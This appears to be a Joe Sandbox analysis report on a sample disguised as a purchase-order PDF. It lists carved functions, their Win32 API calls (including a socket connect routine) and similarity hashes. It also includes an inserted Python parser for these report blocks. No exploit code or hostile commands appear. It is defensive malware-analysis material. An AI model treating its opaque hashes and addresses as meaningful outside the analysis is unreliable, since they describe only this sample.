                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 659298297-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
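The per-function blocks above (an "APIs" list, the "Memory Dump Source" it was carved from, and the "Similarity" hashes) are easier to work with as structured records than as report text, for instance to find every function that calls a given Win32 API or to compare Opcode IDs across samples. The parser below is an added example, not Joe Sandbox tooling; it reads the block layout exactly as it appears in this report, tolerates the indentation and the "Download File" link residue that text exports carry, and indexes functions by API name. The helper names (parse_report, functions_calling, api_index) are this example's own, and SAMPLE_REPORT is an excerpt copied from the blocks above with most "Associated" lines dropped for brevity.

```python
"""Parse the per-function blocks of a Joe Sandbox text export into dicts and
index them by the Win32 APIs each function calls.

Added example, not Joe Sandbox tooling. Block layout and field names follow the
report text; helper names are this example's own. SAMPLE_REPORT is an excerpt
copied from this report with most "Associated" lines omitted.
"""
import re
from collections import defaultdict

SAMPLE_REPORT = """\
APIs
• GetCursorPos.USER32(?), ref: 004478A7
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
• DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
• Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
• Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
• Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
• Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
APIs
• GetClientRect.USER32(?,?), ref: 00447997
• GetCursorPos.USER32(?), ref: 004479A2
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
"""

# One "APIs" entry: Name.MODULE(arg,arg,...), ref: <hex address>
API_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SECTION_HEADERS = ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


def parse_report(text):
    """Return one dict per function block: apis, associated dumps, other fields."""
    functions, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Download File"):          # web-export link residue
            line = line[: -len("Download File")].rstrip()
        if not line:
            continue
        if line == "APIs":                          # every block starts here
            cur = {"apis": [], "associated": [], "fields": {}}
            functions.append(cur)
            section = "apis"
            continue
        if cur is None:
            continue                                # text before the first block
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        if section == "apis":
            m = API_RE.match(item)
            if m:
                d = m.groupdict()
                d["args"] = d["args"].split(",") if d["args"] else []
                d["ref"] = int(d["ref"], 16)        # call-site address as int
                cur["apis"].append(d)
        elif item.startswith("Associated:"):
            cur["associated"].append(item.split(":", 1)[1].strip())
        else:                                       # "Key: value" fields
            key, _, value = item.partition(":")
            cur["fields"][key.strip()] = value.strip()
    return functions


def functions_calling(functions, api_name):
    """Hex call-site addresses of every call to api_name, in report order."""
    return [f"{a['ref']:08X}" for fn in functions for a in fn["apis"]
            if a["name"] == api_name]


def api_index(functions):
    """Map API name -> indexes of the function blocks that call it."""
    idx = defaultdict(list)
    for i, fn in enumerate(functions):
        for a in fn["apis"]:
            if i not in idx[a["name"]]:
                idx[a["name"]].append(i)
    return dict(idx)


if __name__ == "__main__":
    fns = parse_report(SAMPLE_REPORT)
    for name, where in sorted(api_index(fns).items()):
        print(f"{name:20s} functions {where}  refs {functions_calling(fns, name)}")
```

Feed it the whole text export rather than the excerpt and the "Opcode ID" and "Instruction Fuzzy Hash" fields become keys for matching functions between this sample and other reports, while api_index gives a quick answer to questions such as which carved functions touch the registry, the network, or, as here, only dialog and menu handling.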
APIs
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
  • Part of subcall function 004413F0: SendMessageW.USER32(00B71C40,000000F1,00000000,00000000), ref: 004414C6
  • Part of subcall function 004413F0: SendMessageW.USER32(00B71C40,000000F1,00000001,00000000), ref: 004414F1
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
• Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
• Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
• Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
• Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
APIs
• _memset.LIBCMT ref: 0044955A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
• _wcslen.LIBCMT ref: 004495C1
• _wcslen.LIBCMT ref: 004495CE
• SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1843234404-0
• Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
• Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
• Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
• Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
• Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
• Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
• Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
APIs
• IsWindowVisible.USER32(?), ref: 00445721
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
• _wcslen.LIBCMT ref: 004457A3
• CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3087257052-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8ba611301d3ba45eb1b80f84f3d8173e508d12df5c92d0c6dccacad37e84c94d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ba611301d3ba45eb1b80f84f3d8173e508d12df5c92d0c6dccacad37e84c94d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                                                                                                                                                                                            • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 245547762-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
• Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
• Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
• Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
• Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
APIs
• Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
• Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
• Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
• Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
• Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
APIs
• SendMessageW.USER32 ref: 0046FD00
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
• SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
• DestroyIcon.USER32(?), ref: 0046FD58
• DestroyIcon.USER32(?), ref: 0046FD5F
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$DestroyIcon
• String ID:
• API String ID: 3419509030-0
• Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
• Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
• Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
• Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
APIs
• __getptd.LIBCMT ref: 004175AE
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __amsg_exit.LIBCMT ref: 004175CE
• __lock.LIBCMT ref: 004175DE
• InterlockedDecrement.KERNEL32(?), ref: 004175FB
• InterlockedIncrement.KERNEL32(00B72D58), ref: 00417626
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
• Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
• Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
• Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
